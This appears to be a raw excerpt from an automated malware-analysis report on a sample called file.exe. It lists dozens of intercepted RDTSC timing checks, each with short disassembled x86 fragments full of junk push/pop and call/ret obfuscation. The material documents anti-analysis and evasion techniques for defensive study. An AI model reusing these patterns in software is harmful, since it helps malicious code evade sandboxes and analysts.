                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542659 second address: 54266C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2AF93CAAB8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54266C second address: 542670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542670 second address: 542676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F03E second address: 53F043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5416EE second address: 54170B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F2AF93CAABCh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54370C second address: 54378D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2AF86F4E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007F2AF86F4E96h 0x00000011 jnc 00007F2AF86F4E96h 0x00000017 popad 0x00000018 popad 0x00000019 mov dword ptr [esp], eax 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F2AF86F4E98h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 mov dword ptr [ebp+12486CB3h], esi 0x0000003c or dword ptr [ebp+122D3603h], edi 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push eax 0x00000047 call 00007F2AF86F4E98h 0x0000004c pop eax 0x0000004d mov dword ptr [esp+04h], eax 0x00000051 add dword ptr [esp+04h], 0000001Bh 0x00000059 inc eax 0x0000005a push eax 0x0000005b ret 0x0000005c pop eax 0x0000005d ret 0x0000005e movsx edi, si 0x00000061 push 00000000h 0x00000063 xor ebx, 15BA069Fh 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c push ecx 0x0000006d push edi 0x0000006e pop edi 0x0000006f pop ecx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543907 second address: 54390D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544984 second address: 544988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5458C3 second address: 5458C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5439C2 second address: 5439C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54697D second address: 546981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5458C7 second address: 5458D4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2AF86F4E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5439C6 second address: 5439D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5476B0 second address: 5476B6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544A46 second address: 544A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5458D4 second address: 5458EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF86F4E9Ah 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F2AF86F4E9Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5439D0 second address: 5439EF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2AF93CAAC1h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5458EF second address: 5458F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549742 second address: 5497A2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, eax 0x0000000d push 00000000h 0x0000000f mov ebx, dword ptr [ebp+122D3517h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F2AF93CAAB8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov bl, cl 0x00000033 xchg eax, esi 0x00000034 pushad 0x00000035 jns 00007F2AF93CAABCh 0x0000003b pushad 0x0000003c jmp 00007F2AF93CAABDh 0x00000041 jnc 00007F2AF93CAAB6h 0x00000047 popad 0x00000048 popad 0x00000049 push eax 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d push ecx 0x0000004e pop ecx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E862 second address: 54E86C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F2AF86F4E96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E86C second address: 54E8B0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov di, D985h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F2AF93CAAB8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f add di, A16Bh 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c pop ecx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E8B0 second address: 54E8C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4E9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5498E1 second address: 5498E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5498E5 second address: 549988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, edi 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov bx, 14A6h 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e add bh, FFFFFFE4h 0x00000021 mov eax, dword ptr [ebp+122D02F9h] 0x00000027 push 00000000h 0x00000029 push edi 0x0000002a call 00007F2AF86F4E98h 0x0000002f pop edi 0x00000030 mov dword ptr [esp+04h], edi 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc edi 0x0000003d push edi 0x0000003e ret 0x0000003f pop edi 0x00000040 ret 0x00000041 mov dword ptr [ebp+122D2162h], esi 0x00000047 push edi 0x00000048 jmp 00007F2AF86F4EA7h 0x0000004d pop ebx 0x0000004e mov ebx, 6B276C41h 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push esi 0x00000058 call 00007F2AF86F4E98h 0x0000005d pop esi 0x0000005e mov dword ptr [esp+04h], esi 0x00000062 add dword ptr [esp+04h], 0000001Dh 0x0000006a inc esi 0x0000006b push esi 0x0000006c ret 0x0000006d pop esi 0x0000006e ret 0x0000006f or dword ptr [ebp+124803BBh], ecx 0x00000075 nop 0x00000076 push eax 0x00000077 push edx 0x00000078 push ecx 0x00000079 pushad 0x0000007a popad 0x0000007b pop ecx 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550880 second address: 550885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C99F second address: 54C9A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C9A5 second address: 54C9AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E98BE second address: 4E98CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C9AB second address: 54C9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547844 second address: 5478D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4E9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F2AF86F4E98h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push esi 0x00000026 sub dword ptr [ebp+122D26F4h], eax 0x0000002c pop edi 0x0000002d push dword ptr fs:[00000000h] 0x00000034 adc bx, F498h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 xor di, 7A2Dh 0x00000045 mov eax, dword ptr [ebp+122D070Dh] 0x0000004b push 00000000h 0x0000004d push ecx 0x0000004e call 00007F2AF86F4E98h 0x00000053 pop ecx 0x00000054 mov dword ptr [esp+04h], ecx 0x00000058 add dword ptr [esp+04h], 0000001Ch 0x00000060 inc ecx 0x00000061 push ecx 0x00000062 ret 0x00000063 pop ecx 0x00000064 ret 0x00000065 mov ebx, 54666AD2h 0x0000006a push FFFFFFFFh 0x0000006c mov ebx, 517C43B7h 0x00000071 nop 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551F7E second address: 551F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5478D0 second address: 5478D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551F87 second address: 551F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5478D4 second address: 5478DA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551F8B second address: 551F8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551F8F second address: 551FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F2AF86F4EDDh 0x0000000c jng 00007F2AF86F4EB5h 0x00000012 jmp 00007F2AF86F4EA9h 0x00000017 jng 00007F2AF86F4E96h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551FC3 second address: 551FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D916 second address: 54D91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D9E1 second address: 54D9E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D9E5 second address: 54DA0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jnl 00007F2AF86F4E9Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2AF86F4E9Eh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559AE3 second address: 559AF4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55DD4F second address: 55DD67 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2AF86F4E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F2AF86F4E9Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55DD67 second address: 55DD6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55DD6D second address: 55DD71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55DD71 second address: 55DD75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E73B second address: 55E73F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5652FD second address: 565314 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2AF93CAAB6h 0x00000008 jnc 00007F2AF93CAAB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565314 second address: 565337 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F2AF86F4E9Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F2AF86F4EA2h 0x00000011 jns 00007F2AF86F4E96h 0x00000017 jnp 00007F2AF86F4E96h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565337 second address: 565342 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F2AF93CAAB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563FE0 second address: 563FF2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2AF86F4E96h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5645A8 second address: 5645AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5649DB second address: 564A23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F2AF86F4E96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F2AF86F4EA3h 0x00000012 jmp 00007F2AF86F4EA6h 0x00000017 push edx 0x00000018 pop edx 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop eax 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 js 00007F2AF86F4EA2h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564A23 second address: 564A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564A29 second address: 564A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564EA0 second address: 564EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564EA6 second address: 564EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564EB0 second address: 564EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565010 second address: 565016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565016 second address: 56502F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2AF93CAAC0h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56502F second address: 565042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2AF86F4E96h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565042 second address: 565048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565048 second address: 56506C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2AF86F4EA7h 0x0000000c jns 00007F2AF86F4E96h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56506C second address: 565074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565074 second address: 56507A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B4A4 second address: 56B4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2AF93CAAB6h 0x0000000a pop ecx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e je 00007F2AF93CAAB6h 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B4BD second address: 56B4C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A568 second address: 56A56C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A56C second address: 56A59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F2AF86F4E9Ch 0x0000000c jp 00007F2AF86F4E96h 0x00000012 jmp 00007F2AF86F4EA9h 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A86E second address: 56A88C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2AF93CAABEh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jg 00007F2AF93CAAB6h 0x00000010 push edi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A88C second address: 56A890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A890 second address: 56A896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AE18 second address: 56AE22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AE22 second address: 56AE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57148B second address: 57149F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F2AF86F4E9Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57149F second address: 5714A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5714A7 second address: 5714AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 575BF2 second address: 575C0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 575C0B second address: 575C12 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532377 second address: 5323A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movsx edi, si 0x0000000f lea eax, dword ptr [ebp+12484139h] 0x00000015 add di, 9BF0h 0x0000001a push eax 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5323A3 second address: 5187B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F2AF86F4E98h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov edi, 2EE88302h 0x00000029 call dword ptr [ebp+1245116Ah] 0x0000002f push esi 0x00000030 jg 00007F2AF86F4E9Eh 0x00000036 jmp 00007F2AF86F4EA0h 0x0000003b pop esi 0x0000003c jng 00007F2AF86F4EE5h 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F2AF86F4EA6h 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532A51 second address: 532A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532A55 second address: 532A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
